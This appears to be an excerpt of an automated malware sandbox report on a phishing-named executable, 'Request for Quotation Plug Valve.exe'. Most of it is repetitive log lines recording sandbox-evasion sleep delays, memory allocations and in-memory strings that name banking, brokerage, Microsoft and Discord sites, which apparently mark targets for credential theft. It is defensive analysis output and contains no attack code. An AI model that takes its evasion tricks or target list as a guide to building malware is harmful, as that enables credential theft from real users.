                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6620, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeMemory allocated: E60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeMemory allocated: 2670000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeMemory allocated: 7920000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeMemory allocated: 8920000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeMemory allocated: 8AE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeMemory allocated: 9AE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeMemory allocated: 4BE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 599543Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 598671Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 598343Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 598125Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 598015Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 597795Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 597577Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 597359Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 597250Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 596922Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 596812Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 596593Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 596484Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 596375Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 596265Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 596156Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 596043Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 595937Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 595828Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 595718Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 595609Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 595500Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 595390Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 595172Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 595062Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 594953Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 594843Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 594625Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeWindow / User API: threadDelayed 7605Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeWindow / User API: threadDelayed 2249Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6436Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep count: 31 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6972Thread sleep count: 7605 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6972Thread sleep count: 2249 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -599765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -599543s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -599328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -599218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -599109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -599000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -598890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -598781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -598671s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -598562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -598453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -598343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -598234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -598125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -598015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -597906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -597795s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -597687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -597577s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -597468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -597359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -597250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -597140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -597031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -596922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -596812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -596703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -596593s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -596484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -596375s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -596265s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -596156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -596043s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -595937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -595828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -595718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -595609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -595500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -595390s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -595281s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -595172s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -595062s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -594953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -594843s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -594734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe TID: 6964Thread sleep time: -594625s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 599543Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 598671Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 598343Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 598125Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 598015Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 597795Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 597577Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 597359Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 597250Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 596922Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 596812Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 596593Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 596484Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 596375Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 596265Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 596156Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 596043Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 595937Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 595828Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 595718Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 595609Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 595500Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 595390Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 595172Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 595062Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 594953Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 594843Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeThread delayed: delay time: 594625Jump to behavior
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4705089204.0000000001016000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
